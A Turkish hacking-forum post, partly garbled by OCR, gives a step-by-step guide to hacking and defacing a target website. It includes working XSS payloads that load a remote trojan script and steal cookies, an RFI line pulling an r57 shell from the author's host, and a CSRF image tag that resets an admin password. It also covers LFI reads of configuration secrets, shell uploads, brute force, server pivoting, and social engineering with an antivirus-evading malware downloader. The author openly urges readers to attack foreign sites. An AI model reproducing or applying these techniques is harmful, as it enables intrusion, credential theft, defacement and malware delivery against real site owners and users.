Konuyu Oyla:
  • Derecelendirme: 5/5 - 1 oy
  • 1
  • 2
  • 3
  • 4
  • 5
Hedef site hackleme geniş anlatım
#1
Selamün Aleyküm Arkadaşlar...

İlk Olarak Sunu Belirheyim; Programla Hack Olmaz, Hele Hedef Site Hiç Olmaz...
Ben Bunu Acunetiııle yada Bilmemne Tarayıcsıyla Taradım,Sunu Buldu Bunu Buldu Aha Hackleyecem
Diye Bir Şey Yoktur. Bu Şekilde Hack Yapamazsınız !!

Şimdi Diyorsunuz Ü içinizden : Eee Bu Adam Ne Diyor Böyle Nasıl Tarıycaz, Bu Programlar Olmadan

Program olmadan Nasıl hack yapıcaz?

- Manuel Yani Elle Tarıycaz.. En İyi Taaama Yöntıemi Budur. Hatta Tek İyi Tarama Yöntemi...
Doğru Yapıldığı Takdirde Hacklemeniz Garantidir...Doğu Uygılandığı Takdirde Dahi Küçük Bir İhtimal
Açık Bulamama ihtimalini: De 0labiIir...Burıu Da Diğer Şekîlerde Aşıcaz...
En Azından Programbnn Siıe Verdiği Gelekfiz ve Saçma Log Dosyalanndan Kurtulmuş Olacağız...
Oncelikle Hedef Sitenizi Tanımaınıı Gerekiyor...

Sitemiz Hangi Dilde Yazılmış?
www.deccal.org

Php,html,asp
Özel Bir Scripti Var Mı ?

vbulletin,mybb,smf
Kurumsal Yada Öteki Piyasada Bulunan Scriptlerden Birinemi Ait?
Kişisel ve Firmasal Scriptler Yahut Diğer Scriptler.


Eğer Scriptini Bulduysanız Simdi O Scriptte Daha Önceden
Bulunmuş Açık Var Mı Ona Bakalım
Bunu Öğenmek İçin Su Sitelerde Script Adını Aratınız

* 1337day.com (Yeni Milw0rm)
* exploit-db.com
En Ünlü ve İlgi Gören Exploit Siteleri Buralardır...BunIann Dışında Başka Sitelerde De Aratabilirsiniz
Siı.Ama Öncelikli Tercih 1337 .Arattık ve Açık Bulduk Diyelim...

Panele Daldıktan Sonraki Yapılacaklar Neler ? Napıcaz ? Otump Bekleyecek Halimiz Yok Tabii ki...
- Exploitirnizi Kullanıp Admin Paneline Dalıyoruz....
- Shell Upload Ediyoruz
- İndeximizi Çakıyoruz...


Shell Upload Olmuyor Mu ?

- I-lacklediğimiz Bir Siteye Yönlendirerek İndn Orada Görûnmsini Sağlanı... Nasıl Mı?Aşfiıdaki
Kodu Ana Sayfadaki Bir Dökıûmana l-lefhangi Ekleyerek..

<meta http-equiv='refresh" content="5;URL=http://www.yonleneceksite.com'>
5 Sayısını Aıaltıp Arl:ırabilirsiniz...Bu Saniye Ayarıdır...
Ayriyeten Sunu Da Ekleyim...Metayı Bazı Sitelerde Admin Panele Dalmadan Da ükabílirsiniz...
Aşağılarda Bunu Da Göreceksiniz...

- Eğer Meta Da Yemiyorsa Sitede Konu Açıp Öyle Dökeceksiniı içinizi :l
Farz Edelim Ki Bu Scriptte Açık Yok Yada Kamusal Bir Script DeğiI,Kişisel Oluşturulmuş Bir Script...
Bu Sefer Artık Manuel Aramaya Geldik...


Arayacağımız Muhtemel Açıklar ;

www.deccal.org
XSS Bugs
Sql Bugs
XSRF-CSRF Bugs
Rfi Bugs
Lfi Bugs
Upload Bugs
Html Injection Bugs

Bunlar Dışında ;
Bıgs ve Admin Zekasına Yönelik Açıklarexciting [Yani SM Çekicez]
Çokça Kullanılabilen Scriptlerdeki Güncel Açıklarıda Da Tırıyacağız...

Sonra XSS Açıklarını Tarayalım
www.deccal.org

Sql Bug Olması İçin Önoefikle Sitede id Değerlerinin Bulunması Gerek.
Su Şekilde Yani ;

.php?id=
.asp?id=
.aspx?id=

Bunlar Gibi ID Değerleri Varsa Sitemizde Muhtemel Sql Açığı BuIunabílir...Açık Olup Olmadığını
Anlamak için ID Değerinin Sonuna " (tırnak işareti) Kuyup ErıIserlıyoruz...Eğer Site Hata veriyorsa
Muhtemel Sql Açı Vardır...

Bu Takdirde Siteye Manuel Yada Havíj/Benıeri Programlarla Sql Injection Yapabilirsiniz...
Bazen Error Vermeyebilir,Yada Verir De Siz Göremezsiniz...Bu Sefer Eğer Sql Olduğurıa İnaniyorsaniz
Blind Sql Injection Deneyebilirsiniz.Yada I-laııije Atabílirsiniı.Bu Şekilde Panele Dalarıı...
Panelde Ne Mi Yapıcaz ?
Biraz Yukarıda Anlatmıştln exciting Olayı Tekrar Okuyalım Hatırlamıyorsak...


Sonra Xss Açıklarını Tarıyalım

Gene ID Değeri Yada Arama Sayfası Lazım Bize...
Buralara Javascript Kodları nı Direkt Olarak Girerek Yahut Enoode Edip Girerek Error Verdirebiliyorsak
Anlayın Ki Açık Vardır...

- O Güzel Javasaipt Kodumuz Bu ;

Kod:
<script>alert('co3rr')</script>

Nasıl yedireceğimize gelince:
ID Değerlerinin Sonuna Ekleüp Enterlıyabiliriz Yada Search.php?q= Böyle Bir Değerin Sonuna Ekleyerek
Enterlıyabiliriz...

Bunu Char vb Algoritrııalarla Şifreleyerek De Girebifiriz...Bu Şekilde Filtrelerneyi De Aşmış Oluruz...
- Yani Bu Şekilde ;
Kod:
<script>alert('string.fromcharcode(66, 111, 122, 107, 117, 114, 116, 57, 55)')</script>
- Eğer Site Bize Javascript Uyarısı Veriyoısa Açık Var Demektir -Bu Şekilde Servera Zararlı Kod Bile
Yedirebíliriz
...
Kod:
<script scr=http://cod3rr.tk/trojen.js></script>
- Bu Şekilde De Yazılıma Ait Çerez Bilgisi ni Kutucuğa Yansıtabiliriz...
Kod:
<script>alert(document.cookie);</script>
Çerezler (Cookie) zayıf http protokolünün oturum durumunun kontrolünü ve kirnlîk doğrulamayı sağlayan
zayıf bileşenleridir. Saãdıgan eğer sayfayı ziyaret eden kullanıcılann Çerez bilgisini okuyup kaydedebilirse
kendi bilgileri İle yerlerini değişlirerek kurbanın yetkilerine Ulaşabilir.Çerez Bägisi Çalma Konusu
Sitemizde Mevcuttur.Aıama Nlolıorunda 10 Saniyelik Bir İşlernle Gerekfi Oldulnça Geniş Anlatımlara
Ulaşabilirsiniz...Burada Konuyu Açhkça Açanz..Boşuna Daha Fazla Uzatmayalim Zaten Hedef Site
Hack Temel Anlatım Bile Çok Uzun..
Sizi De Sıkmamamız Gerekir Değil Mi ?


Remote File lnclusion (RFI) Açıklarını Tarayalım

Günümüzde Neredeyse Hiç Rastlayarnadığımız Rfi Açıkları, Artık Ölü Bir Açık Haline Gelmiştir..
Nadir Olsa Da Bazı Sitelerde Rastlayabiliyoruz...ID Değerleri Yada include.php Türü Bir Dosya Lazım Bize.
Uzaktan Dosya Dahil Edeoeğiz Serverımıza Bu Şekilde..Mesela Bir Shell Kodu Olabilir Bu ;)
Peki Nasıl Mi Yapıyoruz ?

Kod:
http://hedefsite.com/include.php=http://cod3rr.tk/r57shelI.txt?
- 7 Mutlaka Bulunmalıdır...

Açık Varsa Shell Karşımıza Çıkacaktır.. Biz De İndmi Basar ve Çıkarız...

Local File lnclusion (LFI) Açıklarını Tarayalım

LFI Da Artık Kaışırn Az Çıkmaya Başlayan Bir Açıktır ...Pek Etkili Bir Açık Değldir Aslında Ama
Uğmnda Hedef Site Had: Varsa Denemeye Değer .
Bu Açık Sayesinde Serverdaki Bir Dosyayı Okuyabilirsiniı..
Mesela configurat'ıon.php 'yi Okursanız Database Şifresi, Ftp Şifresi Gibi Kritik Bilgilere
Ulaşıp Baglantıyı Kurup İndeııinizi Basabilirsiniz...



Cross Site Reference Forgery (CSRF - XSRF) Açıklarını

Cross Site Request Forgery (Diğer Adlanyla Xsrf, Csrf, Ve ûoss Site Reference Forgery) Browserlenn
Javascript Çalıştırma Deslseğiyle Kişilere İslıenilenin Dışında Servera Komut Yollanmasını Saglayan
Kodlardır. Sitemiz Veya Sistemimiz Bu Komutlar İçin Genel Olarak Url'Ierden Yararlanır.
Bu Açıklara
Çok Sık Rastlarıı.En Büyük Sistemlerde Dahi...Gmailde Vardı Hatta Bir Ara Ama Tabi Şu An Fıxlendi
Bug'ımız...

Mesela;
Kod:
https//www.hedefsite.com/Management/Change_Password.Php?New_Pass=archavin

Biz de Bunu Bildiğimiz İçin Bundan Yaıarlanıcaz Veya Formlar Oluşturarak İşlemimizi Gerçekleştireoeğiz.
Zaten Amacımız da Bu İşlemleri Gerçeklqtirebilecek Yetkiye Sahip Kişileri Oturum Açmış Durumdayken
Kullanarak Onlar Yerine Kendi Kodlanmızı Güvenilir Kodlarmış Gibi Kulla nıcıyı Kullanarak Göndefmektir.
Ve Bu Saldınlan Htrnl Veya Javascript Kodlan Kullanarak İşlemesini Sağlayabiliriı.

Kod:
<img Src="https://www.hedefsite.com/Management/Change_Password.Php?New_Pass=cod3rr&verify_Pass=cod3rr&submited=1">
Örnek Olarak,l.inki Tıklattığımıı User,Eğer Sitede Oturum Açmış Durumdaysa Şifresinin cod3rr
Olmasını Sağladık .Arlık Kim Tutar Bizi 2exciting


Upload Açıklarını Tarayalım

Upload Açıklarının Yollannı Bulmak Zordur Fakat Rastlamak O Kadar Da Zor Değildir Günümüzde...
Yani Demek İstıecfiğim Su, Siz Upload Aıçığını Ararsanız Çok Zor Bulursunuz, Ancak 0 Sizi Tesadüfen Bulur

Genelde
Muhtemel Upload Açıklı Dosya Yollan ;

upload.php
uploadimg.php
uploader.php

Bu ve Bu Gibi Yollara Başvurarak Shell Upload Etmeyi Deneyehilirsiniz..
Html İnjection Açıklarını Arayalım
Sitelerde Yorum Ekleme Yeri Varsa Buralarda Muhtemel Html İnjection Açıklannı Deneyebilirsiniz...
Ara Sıra Karşımıza ÇıkmaIctadır...Denemel:l:e Fayda Var...
Mesela Bu Da Bi pkk Sitesi ve Html lnj Yöntemiyle İndex Basmıştım Buna

Kod:
- http://welati.net/nuce.php?ziman=ar&icI=3773&niviskar=-1&c:ure=2&kijan=
Meta Kodunu Yorum Başlığı Kısmına Yapıştırıp Yðnlendirebílirsin...
Kod:
<meta http-equiv="refresh" content="5;URL=http;//www.yonleneceksite.com'>

İsi Garantiye Alıyım Diyorsanız Tüm Sahrlaıa Meta Kodunu Yapıştırabilirsiniz...

Joomla ve Wordpress Açıklarını Tarayalım

Arkadaşlar Hedef Site Hack Konusunda Günümüzde En Önemli Hususlardan Biridir...Çünkü Bu
Scriptlerden Tahmin Edemeyeceğiniz Kadar Kullanan Site Vardır.Devlet Siteleri Dahil..Düşünûn Artık.1337 ve exploit-db 'den Bu Scriptlere Ait Güncel Açıklan Bulabilirsiniı...Basma İhtimaliniı Büyük Oranda Artar...Bu Scripftlerin En Büyük Açığı Ola Brute Foroe Açığı Hala En Çok Kullanılan Sürûmlerinde Sabittir..Emin Olun IG Bnıise Force Yörıtıeminde Sağlam Bir Wordlist Kullanırsanız Basmanız %90 GarantidirDiyebiliriz...Brute Force Yðntemlnl Reverse IP l.ookup'tan Çıkın Siteler Ûzerlnde Mutlaka Uygulıyın O Da Ne ? Seslerinizi Duyar Gibiyim... Aşayı Okuyun Hadi 0 Zaman
Simdl Diyelim KI Hlçblr Şekilde Açık Bulımıdık...Server Tarımı Dlye Blr Olııy Vıırdır...
Bu Olay Sayesinde Açık Bulundurmayan Siteleri De Hedef Sitemizle Aynı Sunucuda Bulunan AçıldıSiteler Aracılığıyla Hackleyebiliriz...Bu Siteleri 'Reverse IP Lookup" İle Öğrenebiliriz...En Sağlam
Reverse IP Yapan Adres Burasıdır.Sadece Ksin Sorıuçlan Verir;


http://www.yougetsignaI.com/tools/web-si...eb-server/

Burada Tarıyomı Başında http:// ve Sonunda / ve dosya uzantilan olmadan...Burası Önemli.Aksl
sitelerimizi Taramız...

Diyelim IG 50 Site Qklı...Bu Sitelerde Yukardaki Açıkları ve Aşağıda Bahsedeceğim Açıkları
Tarayacağız...Tut Ki Bir Sitede Açık Yakaladık ve Shell Attık...Arl:ık %99 İndeıı Basrrıamı Ramak
Kalmış Demeklir...Server Geçişliyse Eğer,GeçişIeri Kullanıp Basa nz,Geçişh Değilse Echo Yöntemi
vb Yöntaemlerle Basmayı Deneriz...Gen olmuyor Mu?Dert Etmeyin ; Config Okur Gene Basanı Biz 2)
Config De Mi Yok ?Yada Okunmuyor Mu ?

I-liç Çekemeyiz Böyle Serverlan İşte 0 Zaman Da Serven Rooflayıp İndmizi Basarız Kaçan Yok Yani...
Hem Bizden Kurtulur Mu Hiç ?Diyelim Ki Server'a Da Giremedik.. Eee Napız Vaı Mı Geçicez? - Tablkl Hayır Dipnot : Bu Ara lar Gene ISS Açı Gündeme Geldi..ASP Sitelere Whois Çekebilirsin..Eğer ISS 6 veyaDüşûkse %90 ISS Açığı Var Demektir...Cpanel, Plak Panel Açıklan Da Olduloça İşe Ya ramaktadır...Onlara Da Göz Atın..Whn'›G Açıkları Hakkında Birkaç Tool Paylaşmıştım Forurrıda.0nIar Da Çok Çok İşine Yarayacaktır...


Sosyal Mühendislik (SM) Yöntemi İle Hack
www.deccal.org
Eğer Zekanızı Kullanırsanız Emin Olun Bu Yöntemle Hackleyemeyeceğiniz Site Yoktur.
Güvenlik Zincirinin En Zayıf Halkası İnsandır.Bir Zincirin Halkalarından Birinin Kopması, Zincirin
Parçala nmasına Yeter.
Bu Yöntemi Uygularken Elınııde FUD Bir Java Downloader Bulunmasi Sosyal Mühendislik İle Yapacağınız
Hacklerde Başan Oranınııı %40 Arlırır...

(Forumlarda Paylaşılan Downloaderlar Kısa Süre Sonra Tüm Antivirüsler Tarafindan Tanınır.Bu Da
Etki Göstermez Anlayağınız... Tavsiyem Private Olarak Satın Almanız...Çok Pahalı Değildir)
Downloader' ı Kunıp Hedef Site Adminimizi Yada Reverse lp Lookuptan Çıkan Sitelerden Gözümüze
Kestirdiğimiz Birini Kandınp Trojan Yedirebiliriz.Gerisini Biliyorsunuz Mail Şifresini Alıp Hosting
Şirketine Mail Atabilir,Şifre Yenileyip Hackleyebilirsin.0Imadı Direk Pcden Ftp Yada Admin Şifresini
Çala rsınız ve Sonuç BeIIi.Ama Antivirüslere Yakalanmayan Bir Downloaden Yemeyeoek Adam Zor
Tanınm Ben :.Hiç Yemem Diyen Uyanıklara Yedirdim Bu Yöntemle Çok Site İndirmişliğim De Vardır.
0 Da Olmadı, Phishing Denersiniz...

Sosyal Mühendisliklıe Diğer Bir Yöntem De lleveıse'den Çıkan Sitelerden Gözümüze Site Kestirir,
İletişim Bílgilerinden Ulaşıp SM Çekeısiniz...Bu Şekilde De BasabiIirsiniz..Bu Yöntemle De Bir Çok Site
Bastım..Ama SM'de En Başanlı Yöntem Downloader Yöntemidir Bence Tüm Bu Dedildeıími Uygularsanız
Eğer, Hackleyemeyeceğíníı Site Yoktur...


Unutmayın; En Güvenli Sistem, Fişi Çekili Olandır...


Bunu Da Yabancı Site Varken Masum Türk Sitelerine Bulaşmayın.
Hem Kendi Başınızı Da Belaya Sokarsınız Türk Sitesi Hacklerseniz...Ama Yabancı Sitelerde Yasal Bir sorun
Falan Da Çıkmaz Adınıza, Hem De Yabancı Heykler Daha Eğlenceli
Selametle Kalın.
Beğenenler:
#2
Eline Saglık Reiz
Beğenenler:
#3
Eline sağlık
İnsɑnlɑr değişmez değişen tek şey şɑrtlɑr ve çıkɑrlɑr...
Beğenenler:
#4
eyvallah arkadaşlar...
Beğenenler:

Konu ile Alakalı Benzer Konular
Konular Yazar Yorumlar Okunma Son Yorum
  Yeni Kolay Site Hack :) ByMuh4mm3d 190 5,341 01-12-2016, Saat: 17:27
Son Yorum: ismail007
  Log Açığı İle Site Hackleyin! B3lirsiz 298 14,257 01-12-2016, Saat: 14:56
Son Yorum: GoldenArrow
  Sql Enjeksiyon Admin Authentication Login ByPass Geniş Resimli Videolu Anlatım KingSkrupellos 8 2,269 30-11-2016, Saat: 19:52
Son Yorum: Kolonkun
  2016 Güncel Exploit Dökümanı + Videolu Anlatım KingSkrupellos 2 225 30-11-2016, Saat: 11:11
Son Yorum: Efetimi
  SuspendedPage.Cgi Hacking Yöntemi Konu Anlatım KingSkrupellos 5 137 30-11-2016, Saat: 11:07
Son Yorum: Efetimi
Anahtar Kelimeler

Hedef site hackleme geniş anlatım indir, Hedef site hackleme geniş anlatım Videosu, Hedef site hackleme geniş anlatım Online izle, Hedef site hackleme geniş anlatım Bedava indir, Hedef site hackleme geniş anlatım Yükle, Hedef site hackleme geniş anlatım Hakkında, Hedef site hackleme geniş anlatım Nedir, Hedef site hackleme geniş anlatım Free indir, Hedef site hackleme geniş anlatım Oyunu, Hedef site hackleme geniş anlatım Download


1 Ziyaretçi